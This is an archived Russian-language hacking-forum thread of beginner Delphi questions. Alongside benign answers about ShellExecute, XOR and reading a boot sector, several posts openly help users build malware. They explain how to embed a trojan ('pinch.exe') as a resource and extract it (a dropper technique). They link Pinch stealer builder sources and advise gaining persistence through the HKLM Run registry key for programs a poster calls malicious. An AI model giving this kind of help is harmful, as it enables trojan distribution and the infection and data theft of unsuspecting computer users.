[ Delphi / Pascal ] — начинающим: задаем вопросы (архивная - 2015)

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by banned, 6 May 2007.

Thread Status:
Not open for further replies.
  1. rtyy

    rtyy Member

    Joined:
    8 Mar 2008
    Messages:
    12
    Likes Received:
    7
    Reputations:
    -2
    Delphi.Програмный вызов командной строки с параметрами. Как сделать?
     
  2. GlOFF

    GlOFF Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    689
    Likes Received:
    484
    Reputations:
    4
    Запуск upx на упаковку file.exe, как бы через командуню строку с параметром "C:\file.exe" ->
    ShellExecute(0, "open", "c:\upx.exe", "C:\file.exe", 0, 0);
     
    1 person likes this.
  3. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    823
    Likes Received:
    287
    Reputations:
    359
    ктонить может подробно обьяснить что делает xor желательно очень подробно...



    И еще вопрос подскажите как на dеlphi читать/писать в сектора на жестких или флешках....

    допустим на конкретном примере: нам надо прочитать загрузочный сектор и сохранить его в файл(любой видимый виндой)
     
    _________________________
    #1483 KIR@PRO, 5 May 2008
    Last edited: 5 May 2008
  4. FeraS

    FeraS Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    555
    Likes Received:
    420
    Reputations:
    76
    KIR@PRO
    http://www.delphibasics.ru/Xor.php
     
    2 people like this.
  5. [.BarT]

    [.BarT] New Member

    Joined:
    18 Apr 2008
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    Пишу маленькую программку в которой нужно отсылать сообщение "Вас добавили"
    Используется: ICQClient(от кабана, самый новый, загрузил с асечки)
    Суть проблемы: Идёт отсылка "Вас добавили", в таймере, отсылка идёт с определённого номера, как приходит время менять номер(отключать старый), приложение зависает и выдаёт ошибку, подчёркивая это в коде компонента WSokcet
    Code:
    procedure TCustomWSocket.RaiseException(const Msg : String);
    begin
        if Assigned(FOnError) then
            TriggerError                 { Should be modified to pass Msg ! }
        else
            raise ESocketException.Create(Msg);
    end;
    Подскажите как исправить, пожалуйста. ;)
     
    2 people like this.
  6. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    Code:
    var buff:dword;
    
    asm
        mov ah, 02h   // ф-ция read sector
        mov dl, 00h    // диск а:
        mov dh, 00h  //head 0
        mov ch, 00h  //track 0
        mov cl, 01h   //сектор 1
        mov al, 01h   //читаем сектор 1
        mov es, SEG buff  //адресс сегмента буффера
        mov bx, OFFSET buff  //адресс оффсета буффера
        int 13h      //читаем сектор
      end;
    
     
    #1486 z01b, 5 May 2008
    Last edited: 5 May 2008
    1 person likes this.
  7. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    823
    Likes Received:
    287
    Reputations:
    359
    он ругается... можешь сказать какие переменные мне надо обозначить??? и какой тип просто byte или array[]of byte ?
     
    _________________________
  8. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    хе хе сам он никак не появится!!!
    Напиши конкретнее, что именно тебе нужно!!!
    Т.к. по нажатию на кнопку можно зделать очень многое ;) к примеру скачать файл(троян в твою папку или любую другую), создать файл трояна(что то наподобии билдера) или же "прописать в самой кнопке" функции трояна, которые будут выполняться при ее нажатии. ;) :D
     
  9. Killerkod

    Killerkod Elder - Старейшина

    Joined:
    1 Aug 2007
    Messages:
    178
    Likes Received:
    113
    Reputations:
    0
    Добавь его в ресурсы, а потом извлеки... Типа фейк чтоли? Тогда щас дам пример...
     
  10. Killerkod

    Killerkod Elder - Старейшина

    Joined:
    1 Aug 2007
    Messages:
    178
    Likes Received:
    113
    Reputations:
    0
    http://rapidshare.com/files/113007199/1.rar.html
    Вот тебе сорс примера
     
    1 person likes this.
  11. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    1. создаешь файл pinch.rc
    содержимое
    P.S. pinch.exe твой троян

    2. коммандной строке brcc32 -32 путь\pinch.rc

    3. в проекте {$R pinch.res} + в секцию uses добавляешь модуль Classes

    3. процедура извлекающая пинч из ресурсов
    4. дальше что хочешь, то и делай... он извлечется под именем trojan

    все...
     
  12. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    чувак ты хоть форумом научись то пользоваться, а уже потом задавай вопросы, а то даж смотреть толком ненаучились, а все туда же во взлом лезут!!! вот тут чего только нету:
    http://forum.antichat.ru/forum13.html
    [Dezzter] А это вот тебе, это исходники билдера пинча, от блаксана(там и сам пинч есть) и все по нажатию на кнопку ;) :
    http://rapidshare.com/files/96345585/Pinch301Sources.rar
     
    1 person likes this.
  13. reza4ok

    reza4ok New Member

    Joined:
    3 May 2008
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Есть пару вредоносных программ на делфи. Вопрос: как сделать что бы при первом запуске .exe файла он автоматически загружался при запуске виндовса?
     
  14. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    Прописываешся в этом разделе реестра:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Или кидаеш просто свою прогу в папку автозапуска.
    Вообще об этом очень много написано, так что пользуйся поиском!!!
     
  15. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    Нужно компилировать это: Скчать(MRIM)
    У мне них((
    Кто сможет +!
     
  16. Pir4tt

    Pir4tt Elder - Старейшина

    Joined:
    3 Jan 2008
    Messages:
    73
    Likes Received:
    36
    Reputations:
    5
    это не компелируется это юзается как компонентенг
     
  17. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    Ошибся, собрать как компонент.
    И непонял код...
    Может буть кто мини-help сделает
     
    #1497 -Hormold-, 7 May 2008
    Last edited: 7 May 2008
  18. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    самые простые пути
    1. стандартные ветки автозагрузки
    2. сервис

    PHP:
    program Sample;

    uses
      Windows
    Classes;

    {
    $R pinch.res}
     
    1 person likes this.
  19. reza4ok

    reza4ok New Member

    Joined:
    3 May 2008
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    что бы при запуске винды прога загружалась уже понятно как. Лучший способ я так решил что бы это прога создавала в реестре автозагрузки файл HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
    за подсказку спс Dr.KoD. И так осталось только сделать так что бы при запуске ексе файла прога сама добавляла нужный файл в реестр. Подскажите как это сделать в Делфи :)
     
  20. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    Тебе же сказали.
    1.Создаешь файл pinch.rc
    2.Заполняешь его с таким тесктом
    Pinch_exe RCDATA Pinch.exe
    3.Компилишь этот ресурс скрипт
    brcc32 -32 путь\pinch.rc
    4. у тебя появиться файл pinch.res
     
    3 people like this.
Loading...
Thread Status:
Not open for further replies.